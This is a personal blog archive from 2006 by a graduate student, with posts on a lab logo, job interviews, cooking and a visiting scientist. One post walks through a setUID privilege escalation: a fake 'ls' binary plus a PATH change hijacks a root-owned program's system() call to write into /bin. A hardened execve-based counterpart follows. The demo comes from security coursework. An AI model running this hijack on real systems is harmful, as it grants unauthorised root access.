Monday, February 20, 2006

Logo design...

I was asked to design the Lab's logo. Dr Howard wanted something geeky, something kewl, something recursive or pointing to infinity and something which fits into a square (to save space on the webpage). I was working on the logo in my free time (sleep time == free time :P). On the first iteration I came up with the following logo:
This one was definitely kewl but the recursion/infinity was not there :(.. the geek factor was also very low. Now I am not a graphic designer so no flames for the crappy quality (BTW I made it in GIMP on Debian...).

I started iterating on the design and came up with the following design:
This one is a bit more refined, definitely geeky, kewl, square and is infinite, metaphorically pointing to the essence of our lab working on short term memory, an infinite set of possibilities locked inside the hippocampus. But alas, the readability goes down the drain. I made the right hand side a bit more jagged, cuz that gave an effect of an infinite hallway and kinda improved the readability.

I have kinda hit a barrier here and due to my demanding schedule I have not thought much about the next version. It would be great if you guys can give me feedback or suggestions about the logo, something that has to be changed or totally scrapped....

PS: My interview was good and the interviewer was so thrilled abt my job here that she asked really few technical questions and kept on digging about my work here... Anyway do comment on the logos

Sunday, February 19, 2006

Happy Bday Blog...

Today is my blog's first birthday. I started blogging on Feb 19 '05.... I looked back at the first entry, it was a rant about staying in the office on weekends... phew, came a long way since.

BTW I have an interview with Microsoft on Monday so wish me best of luck. This will be my first technical interview (face 2 face... technically the first was Intel's). I was lucky enough to get jobs without being interviewed in India (no, I did not use references so don't raise your eyebrows). I am having a funny feeling in my stomach as there is so much to study in so little time. I can't possibly brush up on all that I have learnt in a span of two days. Am hoping for the best... the interview call itself came as a surprise to me as my resume did not have any Windoze project in it and shouts Linux all over... well anything for cash.... yeah go hit me with something.

Moreover my GPA (3.44) makes me feel ostracized. Earlier all the Indians in the US blabbered about a fairer education system and said that a higher GPA did not count, but companies like TI, AMD etc. who work more on the lines of device drivers and system software want a GPA of at least 3.5 !!! I guess I will have to work harder (less computer time and more reading time) next time :|

Came across this wonderful guide by Joel on interview techniques... a must read for all tech students.

Thursday, February 16, 2006

SetUID.... Where human intellect meets a dead end

While doing my computer security assignment I was really amused to discover PAM. It is a really nifty way to separate security checking from your code. With just a simple config file modification and no change to the source code or binary (and hence no recompilation), you can charge up the security to levels of insanity. By levels of insanity, I mean that you can make simple commands like su and passwd ask not only for passwords but also for retina scans, voice recognition, DNA analysis (in short, all the biometric systems) etc... and on a single-user system you can do the reverse, i.e. remove all the security.
Then setUID comes along...
For n00bs, setUID is the mechanism that lets a user run a program with the privileges of the program's owner... great for containing access. So when you change your password, the password file is owned by root and the passwd program runs with root privileges. The only way out in *nix is to elevate the user to root just for the duration of the program's execution. But this seemingly innocent mechanism is the root of all evil. At this point a Windows user might ask about their OS.... well, Windoze does it differently. They have a service for each and every program requiring root privilege. That means that they have pseudo-servers running continuously for each service!!! That's crazy cuz for something as infrequent as changing a password, I would hate to run a continuous process on my PC. And they can be exploited too.
Here is how I exploited setUID...
  • Suppose there is a file which has its setUID bit set and uses the system() call to do something.
Let's take a dummy file:

#include <stdlib.h>   /* system() */
int main(void) {
    /* "ls" has no path, so the shell looks it up through the caller's PATH */
    system("ls");
    return 0;
}
  • Now compile it: # gcc dummy.c -o dummy
  • Set the setUID bit: # chmod 4755 dummy
  • Login as a normal user.
  • Now you are the attacker. Write a simple file that does something evil, say copy or overwrite something in the /bin folder. Here is the barebones program for that.
#include <stdlib.h>   /* system() */
int main(void) {
    /* runs with whatever privileges the calling process has */
    system("cp somefile /bin/");
    return 0;
}
  • Compile it and name the output ls: $ gcc somefile.c -o ls
  • Change the environment variable PATH so that your directory is searched first: $ PATH=/home/sridhar/:/bin/; export PATH
Run the program dummy as a normal user and BAM... you have cracked the system. Instead of copying something, I could have opened a root shell and corrupted the whole system.

Now you may ask why a root user would write a program that uses such primitives. Time and again, tested programs like passwd and the webservers are exploited in this simple way. setUID is inevitable. You need to practice secure programming to stop this from happening... but there are too many Venus flytraps. setUID does cover obvious security holes but exposes new ones (the not so obvious types). There are other exploits on setUID too (subtler and hence more venomous) but I guess I made my point.
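A hardened counterpart to the dummy program, added here as an example and not part of the original post: it runs the target by absolute path with execve() and a fixed environment, so no shell is involved and the caller's PATH is never consulted. The names run_fixed and SAFE_ENV and the /bin/ls location are assumptions made for this illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child: nothing is inherited from the caller. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/*
 * Run the program at an absolute path with an explicit argv and SAFE_ENV.
 * Returns the child's exit status, or -1 on error or a non-absolute path.
 * (run_fixed is a hypothetical helper written for this example.)
 */
int run_fixed(const char *abs_path, char *const argv[])
{
    /* Refuse bare names like "ls": they would need a PATH lookup. */
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: give up the setUID/setGID identity before exec, since
         * listing a directory does not need the owner's privileges. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execve(abs_path, argv, SAFE_ENV);
        _exit(127);                      /* exec itself failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const argv[] = { "ls", NULL };  /* argv[0] is only a label here */
    return run_fixed("/bin/ls", argv) == 0 ? 0 : 1;
}
```

A setUID program that genuinely needs its elevated identity for the child would skip the privilege drop but keep the absolute path and the fixed environment.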

For the past 50 years, the computing community has been scrambling to find the perfect security and sandboxing mechanism, and we are no closer to the answer now than we were before.


Friday, February 10, 2006

Food...

Food is the most neglected necessity in my life. For me sleeping, eating & travelling are a waste of time so I do these things as fast as possible (I am a jerk... I am cutting down my sleep to blog :P ). Last one year at Bangalore, I was totally dependent on my Dabba wallah, who gave something edible... other than that I hogged junk stuff.

My past 7 months in US have been worse. Being a vegetarian, with the exception of egg, the only choice I had were cheese pizzas. The vegetarian subs and sandwiches in US are more inclined towards the salad type dressing and eating them is like cud chewing. Uncooked vegetables are not my menu. I couldn't care less... I was happily eating pizzas for 7 months without complaining.

Lately I started feeling physically weak as I am literally staying in the university library due to the terribly taxing courses I have taken this semester, and pizzas don't help much. I started looking for alternatives and thus I began my exciting journey of cooking. (I have been on it for two days now)

My role in group cooking is generally limited to cutting onions or cooking rice, cuz all my other works had been a disaster and I am an expert onion cutter... no kidding... i can do it as fast as the chefs on the television shows... so no one cries :)... so I learnt from my roomies' mistakes and vaguely from my mom's 3 hr crash course.

After months of trial and error, I made a perfect Alu Gobhi curry today...(no body was there so I had all the time to experiment)
If you think it is silly, get yourself a meal after 6 months of only cheese pizzas. Of course I did not make the bread myself, they are frozen tortillas and there is apple juice in the cup.... HEAVEN.

Friday, February 03, 2006

Visit from a Knight

Got to meet Dr Ralph Miller today at work. He is a well known Computational Neuroscientist working at University of Binghamton. I won't bore you with what he does but will surely tell you something about him that excited my very core. Each molecule of my body was vibrating in a strange tune in his presence.

The talk started between my cabin mates and him. We thought that he would be surprised to know that we all were from different fields of study, me being from computer science and the other two being from electrical engineering and bio-medical respectively. As a matter of fact, he wasn't!! He lapsed into a flashback and gave us a brief insight about his background. He got a BS and MA in physics from MIT!!! Was working under a team, three of whom got a Nobel prize!! He got 2 more masters and a PhD from Rutgers university. He told me about a startup company called DEC!! (he told it as if he never knew that DEC was a big company now) and about the PDP-1 he programmed using punched cards. You would have heard a lot about the inception of the word "BUG" in computer jargon but it is really amazing when someone present there at the time tells you his own account. It's really amazing. It's like being in the world of Mythology... and meeting with the titans. He gleefully exclaimed that he made vacuum tubes for his project. I have not even seen one in reality.

The icing on the cake was when I googled for Ralph R Miller and checked out his curriculum vitae. It's a whopping 44 page resume, by far the largest I have seen. I hope to be just like him (I would love to have the Nobel Prize though) when I grow up :) and have the money of Bill Gates :P

Wednesday, February 01, 2006

Life is a fractal

The title of this entry is self explanatory. Life exposes a new dimensionality of itself every time you think that you have understood it. You unravel a complexity and then discover a new one. In the end it's just like accessing an element of an infinite set. If you understand the concept of infinity, you can never have all the elements... logical reasoning breaks down and your conceptual baggage causes you to drown in a sea of irrelevance. Well if you lost me, ... then you are lucky,.. you are in the 98% of the world population who enjoy the bliss of ignorance. I don't mean to demean you but more knowledge does not necessarily make you a better person, sometimes you wish you never knew what you know. (and regarding the infinity problem, read Hilbert's hotel)

The causality of such a thought occurring is strange in its own sense. When I was in high school, I loved puzzles and I loved computers. So I got a bachelor's degree in Computer Engg and Science. At the end of college I realized that I loved the science part better than the engineering part. I developed an appetite for linux all along. Just to take my curiosity to the next level I decided to do MS in computer science. And yeah... software got closer and closer to me. My work in computational neuroscience kept me in sync with the science part of computers. That had its perks and pitfalls, the pitfalls being - you tend to get biased to certain technology. In my case, I started hating Microsoft and liking *nix (well that's what most of the computer scientists like).

Down back in India I had five offers in hand and I was interviewed only twice... so I had the opportunity to pick the job I liked. Recently I got rejected for an internship position at Intel (of course I was overconfident)... that made my confidence shatter to pieces. Later today I attended a career fair organized by my grad school. I applied to Microsoft, against myself.... a decision based solely on monetary grounds. I know that is not a big thing for any of you guys but I felt like I had committed a treachery.... something like murder. I told that to someone (well no names here again) and he said "Anakin don't go to the dark side" ... was I??
I have decided to lose all my inhibitions, do anything possible to reach the top, even if that means I have to maintain cobol databases for some multinational bank... well maybe not if I am strong enough.